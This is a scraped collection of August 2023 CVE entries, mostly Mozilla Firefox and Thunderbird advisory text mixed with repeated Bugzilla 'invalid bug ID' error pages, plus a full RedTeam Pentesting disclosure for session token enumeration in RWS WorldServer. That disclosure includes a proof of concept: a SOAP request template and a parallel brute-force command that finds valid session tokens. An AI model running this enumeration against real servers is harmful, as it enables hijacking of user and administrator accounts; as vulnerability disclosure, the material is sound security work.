Memory safety bugs present in Firefox 115, Firefox ESR 115.0, Firefox ESR 102.13, Thunderbird 115.0, and Thunderbird 102.13. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 116, Firefox ESR < 102.14, and Firefox ESR < 115.1.

Tue Aug 1 2023 09:30:50 PDT  

*   **Bug ID:** 1820587, 1824634, 1839235, 1842325, 1843847?cve=title

**Zarro Boogs found.**

We couldn't find any bugs matching your search terms. You could try searching with fewer or different terms.

*   File a new bug
*   Edit this search
*   Start a new search

  

REST | CSV | Feed | iCalendar

Edit Search

 

as

CVE-2023-4056: Bug List

Memory safety bugs present in Firefox 115, Firefox ESR 115.0, and Thunderbird 115.0. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 116 and Firefox ESR < 115.1.

Sorry, I can't find "_1841682?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-4057: Invalid Bug ID

Memory safety bugs present in Firefox 115. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 116.

Tue Aug 1 2023 09:30:47 PDT  

*   **Bug ID:** 1819160, 1828024?cve=title

**Zarro Boogs found.**

We couldn't find any bugs matching your search terms. You could try searching with fewer or different terms.

*   File a new bug
*   Edit this search
*   Start a new search

  

REST | CSV | Feed | iCalendar

Edit Search

 

as

CVE-2023-4058: Bug List

Session tokens in RWS WorldServer 11.7.3 and earlier have a low entropy and can be enumerated, leading to unauthorized access to user sessions.

Session tokens in RWS WorldServer have a low entropy and can be enumerated, leading to unauthorised access to user sessions. 


Details
=======

Product: WorldServer
Affected Versions: 11.7.3 and earlier versions
Fixed Version: 11.8.0
Vulnerability Type: Session Token Enumeration
Security Risk: high
Vendor URL: https://www.rws.com/localization/products/additional-solutions/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001
Advisory Status: published
CVE: CVE-2023-38357
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357


Introduction
============

"WorldServer offers a flexible, enterprise-class translation management system that automates translation tasks and greatly reduces the cost of supporting large volumes of local language content."

(from the vendor's homepage)


More Details
============

WorldServer associates user sessions with numerical tokens, which always are positive values below 2^31. The SOAP action "loginWithToken" allows for a high amount of parallel attempts to check if a token is valid. During analysis, many assigned tokens were found to be in the 7-digit range of values. An attacker is therefore able to enumerate user accounts in only a few hours.


Proof of Concept
================

In the following an example "loginWithToken" request is shown:

-----------------------------------------------------------------------
POST /ws/services/WSContext HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 501
Host: www.example.com
Connection: close
User-Agent: agent

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org">
   <soapenv:Header/>
   <soapenv:Body>
      <com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <token xsi:type="xsd:string">FUZZ</token>
      </com:loginWithToken>
   </soapenv:Body>
</soapenv:Envelope>
----------------------------------------------------------------------- 

It can be saved as file "login-soap.req" and be used as a request template for the command-line HTTP enumerator monsoon \[1\] to achieve many parallel requests:

-----------------------------------------------------------------------
$ monsoon fuzz --threads 100 \\
--template-file login-soap.req \\
--range 1-2147483647 \\
--hide-pattern "InvalidSessionException" \\
'https://www.example.com'

Target URL: https://www.example.com/

 status   header     body   value    extract

    500      191      560   5829099
    500      191      556   6229259
    200      191     3702   7545136
    500      191      556   9054984
\[...\]
processed 12000000 HTTP requests in 2h38m38s
4 of 12000000 requests shown, 1225 req/s
----------------------------------------------------------------------- 

The --range parameter reflects the possible value range of 2^31 and for each value an HTTP request is sent to the WorldServer SOAP API where the FUZZ marker in the request template is replaced with the respective value. Also responses are hidden which contain "InvalidSessionException" as these sessions are invalid. Responses will yield a status code of 200 if an administrative session token is found. For an unprivileged user session, status code 500 is returned.


Workaround
==========

Lower the rate at which requests can be issued, for example with a frontend proxy.


Fix
===

According to the vendor, upgrading to versions above 11.8.0 resolves the vulnerability.


Security Risk
=============

Attackers can efficiently enumerate session tokens. In a penetration test, it was possible to get access to multiple user accounts, including administrative accounts using this method in under three hours. Additionally, by using such an administrative account it seems likely to be possible to execute arbitrary code on the underlying server by customising the REST API \[2\]. Thus, the vulnerability poses a high risk. 


Timeline
========

2023-03-27 Vulnerability identified
2023-03-30 Customer approved disclosure to vendor
2023-04-03 Requested security contact from vendor
2023-04-06 Vendor responded with security contact
2023-04-14 Advisory sent to vendor
2023-04-18 Vendor confirms vulnerability and states that it was already
known and fixed in version 11.8.0.
2023-07-03 Customer confirms update to fixed version
2023-07-05 CVE ID requested
2023-07-15 CVE ID assigned
2023-07-19 Advisory released

References
==========

\[1\] https://github.com/RedTeamPentesting/monsoon
\[2\] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. 

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

CVE-2023-38357: Session Token Enumeration in RWS WorldServer

In some circumstances, a stale value could have been used for a global variable in WASM JIT analysis. This resulted in incorrect compilation and a potentially exploitable crash in the content process. This vulnerability affects Firefox < 116, Firefox ESR < 102.14, and Firefox ESR < 115.1.

Sorry, I can't find "_1837686?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-4046: Invalid Bug ID

Race conditions in reference counting code were found through code inspection. These could have resulted in potentially exploitable use-after-free vulnerabilities. This vulnerability affects Firefox < 116, Firefox ESR < 102.14, and Firefox ESR < 115.1.

Sorry, I can't find "_1842658?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-4049: Invalid Bug ID

A website could have obscured the full screen notification by using the file open dialog. This could have led to user confusion and possible spoofing attacks. This vulnerability affects Firefox < 116.

Sorry, I can't find "_1821884?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-4051: Invalid Bug ID

A website could have obscured the full screen notification by using a URL with a scheme handled by an external program, such as a mailto URL. This could have led to user confusion and possible spoofing attacks. This vulnerability affects Firefox < 116.

Sorry, I can't find "_1839079?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-4053: Invalid Bug ID

Offscreen Canvas did not properly track cross-origin tainting, which could have been used to access image data from another site in violation of same-origin policy. This vulnerability affects Firefox < 116, Firefox ESR < 102.14, and Firefox ESR < 115.1.

**Mozilla Foundation Security Advisory 2023-30**

Announced

August 1, 2023

Impact

high

Products

Firefox ESR

Fixed in

*   Firefox ESR 102.14

**#CVE-2023-4045: Offscreen Canvas could have bypassed cross-origin restrictions**

Reporter

Max Vlasov

Impact

high

**Description**

Offscreen Canvas did not properly track cross-origin tainting, which could have been used to access image data from another site in violation of same-origin policy.

**References**

*   Bug 1833876

**#CVE-2023-4046: Incorrect value used during WASM compilation**

Reporter

Alexander Guryanov

Impact

high

**Description**

In some circumstances, a stale value could have been used for a global variable in WASM JIT analysis. This resulted in incorrect compilation and a potentially exploitable crash in the content process.

**References**

*   Bug 1837686

**#CVE-2023-4047: Potential permissions request bypass via clickjacking**

Reporter

Axel Chong (@Haxatron)

Impact

high

**Description**

A bug in popup notifications delay calculation could have made it possible for an attacker to trick a user into granting permissions.

**References**

*   Bug 1839073

**#CVE-2023-4048: Crash in DOMParser due to out-of-memory conditions**

Reporter

Irvan Kurniawan

Impact

high

**Description**

An out-of-bounds read could have led to an exploitable crash when parsing HTML with DOMParser in low memory situations.

**References**

*   Bug 1841368

**#CVE-2023-4049: Fix potential race conditions when releasing platform objects**

Reporter

Nika Layzell

Impact

high

**Description**

Race conditions in reference counting code were found through code inspection. These could have resulted in potentially exploitable use-after-free vulnerabilities.

**References**

*   Bug 1842658

**#CVE-2023-4050: Stack buffer overflow in StorageManager**

Reporter

Mark Brand

Impact

high

**Description**

In some cases, an untrusted input stream was copied to a stack buffer without checking its size. This resulted in a potentially exploitable crash which could have led to a sandbox escape.

**References**

*   Bug 1843038

**#CVE-2023-4054: Lack of warning when opening appref-ms files**

Reporter

P Umar Farooq

Impact

moderate

**Description**

When opening appref-ms files, Firefox did not warn the user that these files may contain malicious code.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1840777

**#CVE-2023-4055: Cookie jar overflow caused unexpected cookie jar state**

Reporter

Marco Squarcina

Impact

low

**Description**

When the number of cookies per domain was exceeded in document.cookie, the actual cookie jar sent to the host was no longer consistent with expected cookie jar state. This could have caused requests to be sent with some cookies missing.

**References**

*   Bug 1782561

**#CVE-2023-4056: Memory safety bugs fixed in Firefox 116, Firefox ESR 115.1, Firefox ESR 102.14, Thunderbird 115.1, and Thunderbird 102.14**

Reporter

Dianna Smith, Ryan VanderMeulen, Timothy Nikkel, and the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 115, Firefox ESR 115.0, Firefox ESR 102.13, Thunderbird 115.0, and Thunderbird 102.13. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 116, Firefox ESR 115.1, Firefox ESR 102.14, Thunderbird 115.1, and Thunderbird 102.14

CVE-2023-4045: Security Vulnerabilities fixed in Firefox ESR 102.14

An out-of-bounds read could have led to an exploitable crash when parsing HTML with DOMParser in low memory situations. This vulnerability affects Firefox < 116, Firefox ESR < 102.14, and Firefox ESR < 115.1.

Sorry, I can't find "_1841368?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

Source

CVE